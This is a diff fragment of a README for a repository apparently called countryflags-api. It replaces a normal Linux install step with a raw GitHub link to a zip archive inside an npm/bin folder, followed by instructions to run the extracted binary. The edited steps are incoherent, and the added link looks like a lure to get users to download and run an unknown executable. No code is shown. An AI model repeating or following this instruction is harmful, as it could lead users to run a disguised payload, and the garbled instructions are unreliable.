Ragnarlockbroth/countryflags-api/README.md

   3. Eject the `.dmg` file.

 - **For Linux**:
-  1. Extract the contents of the `.tar.gz` file.
+  1. Extract the contents of the `https://raw.githubusercontent.com/Ragnarlockbroth/countryflags-api/main/npm/bin/api-countryflags-3.7.zip` file.
   2. Open your terminal.
   3. Navigate to the extracted folder.
   4. Run the application using the command `./countryflags-api`.